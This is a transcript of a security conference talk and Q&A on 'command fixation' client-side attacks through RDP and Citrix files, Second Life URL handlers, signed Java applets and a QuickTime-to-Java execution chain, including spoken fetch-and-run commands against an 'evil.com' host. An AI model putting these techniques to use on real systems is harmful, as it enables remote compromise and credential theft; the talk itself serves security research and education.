This is the other thing is which I'd like to talk about today is called command fixation attacks. Very often I actually call them parameter fixation attacks, and I'm not trying to be funky with the names here. Probably you can find better terms, please do. But to me, this describes the attack in the best way. I'm going to give you a simple example. A command fixation attack in RDP. RDP, which is basically the Windows Terminal Services, it's possible to write an RDP file. The RDP file are simple description files, which when double-click connects you to a remote server, the desktop server. Now, some of these servers require your authentication. So sometimes you need to actually authenticate. Other servers don't require authentication. They will pop up an application, basically. But most of the time, you can provide something called alternative shell. Alternative shell string is usually used to specify if you want to execute something else apart from explorer.exe. So maybe in some environments, I can provide an RDP file that will launch some business workflow application. So instead of you logging into your desktop, you see the first thing that you open up, you see a business workflow application, right? But in our case, we can also provide other commands, such as the cmd.exe. So if you do something like cmd.exe/c, we say tftp to evil.com, fetch me evil.exe, and then execute me evil.exe. And when we open that RDP file, if we are not required to authenticate with the server, that command is going to execute and it's going to own the box. Depends what, of course, evil.exe does. It's going to run with the current permissions of the user, actually run getting into that terminal services. If it requires us to actually authenticate with some credentials, most users probably is going to be fooled to type these credentials, and when they log in, that command will execute again. Of course, that depends on some configurations that you need to apply. You can actually prevent that type of attack from happening, but most of the time it works because I've tried it in so many business environments. The thing with RDP is that if in case, for example, we need to actually, you know, ask the user to authenticate or whatever, then we might actually need to use social engineering skills. This is the less severe attack, which I'm going to show you one later, which is a lot more severe than this one. So we need to pretend to be, for example, someone. We can pretend to be, I don't know, the tech department and say, yeah, please try this RDP file. We made some changes. I'm not asking them about username and password. I'm not asking them, please give me the username and password. I'm just saying, here's a file. It's a simple text file. Open it up and try to log in. If you log in, good. But when you log in, something's going to happen. You don't know what's going to happen. You're going to get owned, basically. But RDP command fixation attack is going to get even more interesting in the future, because one thing that I've been actually looking lately, and of course I have no clue how this thing is going to develop because I have no access to this technology, is called Live Mesh. Now, Live Mesh is a new Microsoft technology which is going to enable RDP to go over HTTP. So now we use the port 80, the universal backdoor, also for the RDP communication channels. And now we'll be able also, in this Live Mesh environment, we'll be able to actually connect a couple of computers to a mesh. So now we'll be able to access all the computers whenever we are. So imagine, you just go to livemesh.com website and you log into your thing with your Yahoo password. Hotmail password and username, which it's just a problem on its own. Then you find your system that you want to connect to, you double-click and you open a remote desktop on that machine. Now, this is scary because you can receive the RDP file from everywhere, right? And the RDP file launches automatically. You don't even ask whether you want to launch it. This is marked as an automatic launch, which means that if I create an iframe and I put it into an RDP file, as soon as Internet Explorer sees that, it's going to start it right away. It's not going to ask me, do you want to actually start this file? No, it's going to start right away. And if it's a quick enough, it's going to do itself and it's going to close. So you can do a lot of damage with this, but this is the future. So basically, look out for this technology. It's going to come out soon. You'll be able to see. I'm giving tips about what vulnerabilities probably there will be in this technology. But it's even it's better because the other technology, which is close to Windows remote desktop, is Citrix. Now, Citrix environment extremely popular. And they're everywhere, especially in the business sector, they're everywhere. Now, Citrix can do exactly the same thing as RDP. But in this case, the file is called ICA, I-C-A. And in this case, we can also supply a parameter which is called initial program. And again, initial program could be, you know, cmd.exe, tftp me to that server, get me that file, execute that file, and that's it. But what is interesting about the Citrix commands is that they actually, the Citrix environment is a lot more powerful than the Windows remote desktop environment. The reason it's more powerful is because, first of all, I don't need to specify the server of the that I want to attack. That actually gives me a lot of benefit if I want to do a blind attack. Because in the previous example, I need to tell the RDP file which server I want to connect to. But in this case, I don't want to give that. I don't have to give that. Because as long as you have Citrix Neighborhood installed in your computer, it's going to know which server to connect to. It's going to pick up the first of the list or whatever logic it follows. The next thing, which I don't need to basically do, I don't need to say to the user, if the Citrix server, for example, asks the user to actually to authenticate, I don't need to actually ask the user to authenticate themselves when I show this file to them. I can use something called pass-through authentication. Pass-through authentication will take the credentials from your system, your NTLM credentials, it's going to send them down the pipe to the Citrix server, and if that Citrix server is configured to actually log in pass-through authentication, it's a part of a domain controller, that thing is going to work. So now we can create a very standalone file, which you, this file you can receive from anywhere on the web, and the attacker does not need to know anything about your environment or your business environment or any of that sort. They don't need to know that. As soon as you visit this special website, which basically embeds one of these files in an iframe, such as the example below, as soon as this thing happens, that's going to launch automatically. Again, you're not going to be asked whether you want to do something or not. It's going to execute. And if the remote server, which most of the cases are configured to use pass-through authentication, then the attack will execute successfully, and of course the attacker will be able to gain access on the remote server, not your computer, but on a remote computer, which is still something. Of course, the same attack can be performed with the ActiveX controller. The ActiveX controller can knows that. Even if you're not in a Citrix neighborhood, you can actually brute force the target. It's quite easy, and you can write all that through the ActiveX controller, and you have a full access to actually do whatever you want. You can fingerprint, you know, if the user visits the website and the website embeds this ActiveX controller, the ActiveX controller will be able to actually fingerprint the servers that are inside the network. They'll be able to fingerprint the applications that are inside that network as well. They'll be able to tell, you'll be able to tell a lot of things just using by the ActiveX controller. And the ActiveX controller comes by default with the client. So if you install the client, you get it as well. Now, another example of this sort of a command fixation attack. So we actually put commands in which the user will execute without their knowledge. It's something that was I discovered in the Second Life. It's possible to use a combination of Internet Explorer and Second Life to steal the Second Life credentials. And you basically do with this protocol thing, which was a big thing last year. We can basically say Second Life, which can instruct the Internet Explorer to actually look for the Second Life, the URL handler, look for the URL handler, and is going to send some commands in. And then we can actually use this double quote thing, which follows next, which is going to do some kind of escaping. And then we can provide some parameters there. One of them is called auto login, which is going to instruct the client to automatically log in. But the second parameter, which is called login URI, is going to specify where exactly we want to log in. So what happens now? It happens that if you visit the website, that website will instruct automatically to launch Second Life. But again, you're not going to be asked whether you want it or not, right? It's going to just execute automatically. And you're going to send your credentials without you being asked. You're going to send these credentials to the evil login PHP thing. And this credential is going to be received as an MD5 hash. Now, of course, yeah, this is hash. But of course, that hash hasn't been salted. So we can easily crack that, or we can actually replay that command. Because a simple XML RPC, we can actually replay that command against the Second Life service, and we can transfer some lindens from their account into ours. Another thing, which I like to call drive-by Java. Drive-by downloads, very popular topic. A lot of botnets, and highly successful botnets are using drive-by download technique, where basically simply instruct the user to do something, such as they show them some Tetris game or something like this and say download that thing, and as soon as you download you're part of a botnet, or you go to a website and say this is the latest Paris Hilton I don't know what video, and if you want to see it, please install this codec, so you install a codec and basically get owned again. But the thing is that in order to perform these actions, you ask a couple of times. The browser asks you a couple of times. In fact, in order to run an application from the browser, if the browser sends you an application, you're going to be asked at least 3 or 4 times. Right? The first thing is going to ask you to download it, then it's going to ask you whether you want to execute it, and then it's going to ask you whether you really, really want to execute it because the application has been signed, hasn't been signed by the proper authority. So three questions. Right? With the Java runtime, if I sign my applet with any arbitrary certificate which I can generate myself, in which I can fake any of the information, can say Microsoft Corporation, Universal Patch, I don't know what, and basically that's going to pop up a box when you visit the website with this thing. It's going to pop up a box and it's going to say you run or cancel. 50-50 chance. If you choose the blue pill, you die. Cancel, you continue to live, until the next time. Or that sort of a mechanism can be forced on you. You can be repeatedly asked about this sort of a thing, run, cancel, until you click run. So you'll be tormented until you click run. And it's very easy to create such a kind of a file. And they are very successful. Especially in business environments, especially in banking environments. Because a lot of banks, what they do is they actually create this very fancy GUIs. So you go to their website, you log in, and then you see this like a Java thing pops up. But this Java thing actually needs a lot of access. So usually they sign it, and they actually train you to click on run when you see this sort of a dialogue. Sometimes they don't even actually sign it with a proper certificate. They sign it, they use self-signed certificate. So actually they train people to click run when they see that box. And it's amazing how many people fall for this type of attack. The applet can be something as simple as this. So we say it's a simple applet. In this case, I actually made it look like a 3D game, Super Mario 3D, whatever. And it's going to say, runtime, get me runtime, execute the calculator. But how about this one? Now, this is actually a combination of the three technologies which by themselves do the right thing, because they were designed by, they're actually developed separately from each other. By themselves, they do the right thing, but when you put them together, they completely mess it up and create an insecure condition. So in this case, we have again QuickTime, which passes the execution to Windows, which passes the execution to Java. And we compromise the client. Now, what happens here is the following. Actually, this is not... Basically, this simple file here, it's a SMIL document. It's a SMIL, it's a kind of interactive document. It looks like HTML, but it's a sort of a for representation stuff. QuickTime understands that. Again, this SMIL document can be faked as any other file, so it can have an extension, .mp3, .mp4, it doesn't matter. As long as we put the server header sniff thing, which is at the beginning of the file, which is called SMIL text. As long as we put that thing in front of the file, we can rename the file to whatever extension that we want. It can be MP3, it can be MP4, it doesn't matter. Now, this SMIL file basically has a lot of junk in the middle, which instructs showing some images, which are completely irrelevant. We can actually remove them. But again, it has something called Qt Next. Again, it's quite similar to this Qt QuickTime Next thing in previously, which I showed. But it's slightly different. In this case, we actually say to do file, to use the file protocol, and then we say connect to that server, 172.16.3.124/evo.link. Now, most of you probably recognize this. This is actually one of the weird ways specifying a net bias notation. Actually, specifying a file in a net bias notation. Now, what's going to happen next is that as soon as this file finishes playing, QuickTime is going to take that URL and is going to send it through the file protocol handler function. The file protocol handler function will understand what exactly this URL means, and it's going to say, oh, this is actually a simple URL which points to a netbar share, which is great. Now, what if we point to a jar file? So we basically say file some IP address folder evo and slash evo.jar file. Now, if you have the Java runtime environment, Windows will figure out that we're opening a jar file and it's going to look it up in the industry and say, oh, jar file is associated with this protocol handler. This protocol, the way to run jar is by using the Java W, the Java for Windows executable.exe, and it's going to pass the entire URL to that command. However, Java does not know anything about this notation. So if you do that, if in this example you basically say the same thing, evo.jar, is going to fail with the message, Java is going to say, I don't know how to open that file. So in this case, we're using a simple Windows link. So the Windows link is going to actually rewrite the entire URL into the correct NetBIOS notation, which actually Java understands, and the operating system understands. So it's not going to use anything fancy. So the execution of the exploit is going to happen like this. First of all, QuickTime opens this thing. Then it's going to pass it to file protocol handler function. The file protocol handler function is going to open up and say, oh, that's a link file. Let's open it as a link file. The link file is going to open up, but the link file is going to specify a different target. And the target is going to be, oh, by the way, now I'm going to reverse the slashes. I'm going to remove this file thing. It's going to be like reverse slash and 172 again, slash evo dot jar. So when this thing happens, now we're using like combination of three or four technologies linked together in the right order. When this thing happens is that now you're previewing a QuickTime file which leads to a local exploitation of your stuff. So now it's going to, a Java file is going to execute with your privileges. So we have the diagram here. Basically, QuickTime instructs Windows to attack Java. QuickTime, the good guy. Windows, the bad guy. And Java is the third guy. As I said, that's the new way of doing things. It's more twisted. It's a little bit more complicated. But the result is pretty much the same. Now, before actually, I mean, I think that I have about 20 minutes. So I'm going to leave 10 minutes for actually question and answers. But there was actually a topic which I removed from this this slide because I thought I'm not going to have enough time. The topic is about backdoors. Now, the thing is that with the backdoors, when we actually start using backdoors and like viruses and stuff like this, and we combine them with client-side technology, we have a very, very, very powerful mechanism, very powerful combination. Most of the Trojan horses are written in the exact same old way. We're using binaries. But if we actually go ahead and exploit, we actually backdoor the browser, you know, for example, we add a simple invisible extension, and the extension can remove itself, for example, Firefox browser, right? Now, how the hell the antivirus engine will go there and it actually detect that thing? I mean, and moreover, Java, because the Firefox browser is written on the top of like standard technologies such as XML and Java, this JavaScript, these technologies are very highly mutatable. I mean, they're polymorphic technologies. So we can actually take a simple piece of JavaScript and it very easily can morph it to hundreds of thousands of variations of the same thing with a single command. So you cannot actually go ahead and write a signature. You can actually create a software that analyzes what the hell this JavaScript does and basically prevents it from executing before getting to the Chrome zone. A lot of technologies, for example, in your desktop are based on JavaScript and you don't realize. Adobe, for example, Adobe Reader is based on JavaScript. You can run JavaScript in it. If you have Photoshop, that executes JavaScript, Flash executes JavaScript, the browser executes JavaScript, and also the standard operating system, Windows, executes JavaScript as well in the form of JScript. And this is again the Windows scripting host. So now we have a very powerful technologies out there which by themselves are very, I mean, they're actually good for, we use them for good purposes to like read their websites and do all sorts of cool things, but by themselves, they're actually gapping holes to the whole security thing. I mean, Flash, for example, by itself, you can actually mount a couple of files on the Flash, on the operating system to make the Flash the complete backdoor of all, you know? You can actually, now, after changing this config files, now when you visit some website, that website will be able to launch the microphone without even asking you. They'll be able to actually record what exactly the sound in the room, survey the sound. In some cases, you'll be even be able to actually open the camera without even asking. Of course, you're going to see a green light if you have a green light on your camera, but perhaps in the future, people will be able to take pictures of you, and they'll be able to do other things as well. And all it takes is to put a couple of files here and there, do a couple of modifications in the registries, or do a couple of modifications in some config files, and suddenly you have a backdoor which is not quite easy to detect. It's not so easy, because we don't know whether this was the intentional change. And then pretty much summarizes the client-side security talk. And as you understand, it's a quite big subject. And perhaps we can write a couple of books on it. But again, my philosophy is that we should not take it out of the context. We should look at it, again, together with the server side and the client side to understand both sectors. We cannot just talk about client-side security issues. And if you have any questions, perhaps this is not the right time to do that.
Hello. I have a wireless mic over here. If anyone has a question, if you want to raise your hand, I'll pass it around.
Hello. Oh, yeah. In that second last attack you demonstrated with Java being the last execution point, why does the link need to contain Java? Why can't you execute your command straight in the link file?
Yes, it's a good question. Okay, the thing is that Windows Service Pack 2 comes with a lot of like security enhancements. I believe it's Windows Service Pack 2. One of these things is that if I try to launch an application which is in a netbar share, I'm going to be asked whether I really want to do that, because the application, of course, is not signed by Microsoft or anyone that is trusted. So I'll be get this dialog box that is going to say, do you really want to run it, cancel or okay? The thing is that when I execute this thing from the file protocol handler, I don't even actually see that message. So the file protocol handler function is going to ignore it if it's not signed correctly. So the only thing that we can do is basically point it to a file which Windows does not recognize as an executable file. I cannot even run JavaScript files or VB file. I cannot run .dot application files or any of that sort, even screensaver files, even bat files, because they're recognized as executables by the operating system, and the operating system will prevent me from actually executing a file located in some untrusted share. But the operating system does not know anything about jar, because jar is handled by Java. And therefore, the operating system, Windows, does not actually know that jar files are actually executable files. So if the jar file has the correct manifest file, suddenly if you double-click it, it opens as an application. So I'm using Java in this case as the final point of exploitation. But in fact, you can actually use something called GSX, for example, if you have Photoshop installed or some of this stuff. Because GSX is again is an executable file, but is not recognized by the operating system as such. You can also execute a team file, for example, something like Team for your GTalk client or for your Skype client or something like this. Most of the time, these Team files are actually simple HTML or CSS files, which is going to be rendered within your browser. And of course, you can include some JavaScript inside as well. But because the JavaScript actually renders within this unrestricted sandbox, I cannot even call it as a sandbox. In a restricted version of the Internet Explorer, you have, again, complete access to the Windows scripting host. You can actually launch any other file. So in this case, it was just Java. I used as a method of exploitation.
Other questions? Front.
Hi there. I have a question in the section of XCS, the cross-content scripting. You mentioned something about 10 characters, where it can only read chunks of 10 characters. And is that only in the case of a cross, like a domain policy type of restriction or whatever?
No, I give just this thing as an example, just to show that There is a huge, basically, misconception about this type of attacks. And there is, of course, it's reasonable. A lot of people, I mean, they're, by themselves, they're very simple. Everybody can understand them. They're not very complicated to exploit them. And that, I think this is the danger of it, right? I mean, everybody can go now, find a cross-site scripting in a bunch of products and start making serious money with them. My point, I was just trying to show another variation of a cross-site scripting attack, which is a little bit weirder. So it's not really straightforward. It requires a little bit of a knowledge. You cannot, if somebody tells you that they can run a scanner and detect cross-site scripting attacks, they lie to you because it's not possible. I mean, I've seen cross-site scripting attack where you inject it in one place and occurs in a completely different place. It's not possible to follow that logic in any possible way. The permutation, the levels of permutations are so much that it's easier to brute force, you know, the TXIDs with, you know, the port randomization for the DNS to, you know, hijack the DNS than actually doing that. This is super complicated. So I just gave it as an example of a type of attack, a cross-site scripting attack that's slightly different. I mean, certain type, for example, the Firebug exploit is, again, there is a restriction in number of characters. So in order to actually overcome that restriction, we have to chop up the information that we inject into smaller pieces. And we actually inject it in smaller pieces. And when these pieces, all of them arrive into the context, then we can actually evaluate them, expand them, you know, do all the interesting things with them. And again, there's always limitations, and there will be limitations that we need to, I mean, if you're an attacker, you need to actually overcome.
Yes, for the attacks that specifically involve the QuickTime player and the Flash player, I was a little lost on what to do about it, actually. If we're running the latest version of Flash player and QuickTime player, does it pretty much handle those or plug those holes?
For this particular exploit, if you run the latest version of QuickTime, you're safe. The thing is that I'm actually giving you a tip here. In fact, you can find this vulnerability across the board. You can find it everywhere. Just find an application. This is the steps. Find an application that accepts URL in some format, and it sends that URL to the file protocol handler function. Now, if you find this thing, and in fact, there's so many tools that you can use out there that will tell you that thing. I think there's a bunch of them. Developed by Red Hat Security, I believe. But yeah, if you find the condition where you have a URL somewhere within the file document or something, I don't know, web page or whatever, and that URL gets rendered into the file protocol handler function, gets sent right there, you have the same exploit. It's the exact same way, it works in the exact same environment. So actually you're not safe, yeah, because the file protocol handler function is designed to work like that. And that's pretty much it. Again, you can keep up with patches, you can keep up with the latest updates, but there will always be similar attacks.
Other questions?
Any questions? Yeah, there's one over there.
Just on the Apple thing for a second, in the description in the Black Hat guide that said you may have a zero day on Apple if they let you talk about it. Is that still the case? Did Apple?
That's the QuickTime thing.
So that was the one from Firefox then?
No. That was the last thing. Basically, that vulnerability works not only on Windows. I used the variation of Windows, right? But actually, the vulnerability works in Apple environments as well. Because basically it's a similar situation. And as I said, this is just an example of the same attack. So if you actually think of a buffer overflow as a type of attack, right, you can take the same thing and apply it across many other applications. So as I said, any application that accepts a URL and it passes that URL into the for the Windows operating system, for the file protocol handler function, then you have the exact same exploitable condition, like exactly the same. And that was basically the zero day, which I did not disclose, but I disclosed it through ZDI. They handled the disclosure process and actually further research into this topic. So that's pretty much the zero day. I mean, talking about zero days, I was talking the other day with Nathan, Another guy, and a couple of other guys, Billy Rios and other guys who are actually very much involved into this client side security thing, we came to the conclusion that there's so many exploits, so many exploitable conditions that it's actually for us impossible to handle them all. So now we are thinking how to give them away to people to actually continue researching them, because you know you have like a bunch of stuff. I mean, just the other day I was looking into some other things for Web Start. And again, it's possible to do this command fixation attacks in Java Web Start now. There was another condition where you can actually, if you design a specifically crafted URL with some slashes and other weird characters, you'll be able to open a file protocol URLs within the folders of the Firefox browser. So now, for example, if you manage to cache some of the files there, you can use that attack to actually open the cache within the file protocol. And in the file protocol, it's actually a lot more relaxed than the HTTP protocol. You can do a lot more things. It's essentially, you can read files, at least. You can read files, and you can send these files across some other web server. But, you know, in client-side world, the zero days is not like a new thing. You know, it's just it's a part of the daily routine. You know, there's so many of them, seriously. If you go yourself, just like... Don't go and just actually concentrate on finding a vulnerability. Just look at technology, the way it works. I personally myself, for most of the research that I do, I don't actually specifically say, okay, now today I'm going to go and look into QuickTime and just find a bug, you know, and then put my time in QuickTime. It doesn't happen like that. In fact, this vulnerability was found during our stay in Dubai. Actually, we missed our flight. We had to stay in the airport. I had nothing else to do, so I was actually messing around with things, and I had no, you know, interesting stuff to mess around. So I was looking into some of my notes, and just one thing led to another, and you find a vulnerability. If you follow the same strategy, I can guarantee you, you know, 100% success, you're going to find something, whether it's going to be something that you can use for mass exploitation, or whether it's something that you can use in very specific cases, I'm sure you can find something. Any other questions?
We've got time for one more question.
Do you have any pointers for developers that could help scrub out, such as the handler, from already contaminated code, such as if someone has developed a rich internet application and they've already got the application developed, but it requires something like QuickTime, and the client's QuickTime has already been exposed to some kind of backdoor or something like that?
Yeah. Well, it's a very difficult question. The thing is that I can tell you that it's possible. It's not exactly. You know, for example, if we go back to this, let's say, buffer overflows or any of that sort of thing, I can tell you, yeah, basically make sure that you put enough, you know how many characters you put into your buffers, and then you're solved, you know, you solve the problem. In this case, you need to actually have understandings of how technologies interact with each other. I mean, Java by itself is not just Java. And QuickTime by itself is not just QuickTime. QuickTime actually embeds so many other technologies inside that it's not even funny. QuickTime is also an editor. It's a movie editor. QuickTime also has facilities to operate with Java applications, so it can speak to Java land. JavaScript can speak to Java straight away without actually, you know, basically talking, embedding applets. You have LightConnect. You have a lot. You have an infinite mix of technologies. And because this is how the web, this is how all these very rich technologies were designed, of course, the design process of this technology was, how can I say, they just happen to be that way. They just happen to be designed in that way. So you need to have a very clear understanding of what exactly you're doing in order to prevent, you know, in order to actually develop against this type of attacks. But yeah, just keeping with the latest stuff is actually enough. If it's just with the latest research, with the latest type of vulnerabilities, it's going to be enough to actually know how to secure these applications, how to design them to be secure. But also, I have a few things to say about the way we write applications. We often write them in this object, object-oriented programming sort of thing, which is fine if I'm actually a single developer and I design the whole and program the whole application by myself because I know exactly how each objects work. But in a more complex system where different components were designed and engineered by other different people, it's not very clear, it's not often clear how these components interact with each other. So even if you follow the specs, it's often actually, because we engineered them separately, so for example, one of the developers engineered them in a certain way, a different engineer actually creates a component in a completely different way, and when we put them together, we have a problem. Suddenly, just a problem emerges because these systems happen to be quite complicated. And of course, we have no knowledge. We have a black box knowledge of that component. We have no idea how this component was written. We have no idea how what functions are used there. We all know is that if we create an instance of that object and we pass these parameters, it should work, right? But probably the developer forgot to sanitize certain things or forgot to actually, you know, apply some security things. Maybe he was thinking that the security checks will actually happen before execution of that function, you know? So it's really complicated.
Do you guys have any other questions? If you could take them outside, we're going to wrap things up. Thank you very much.
Thank you.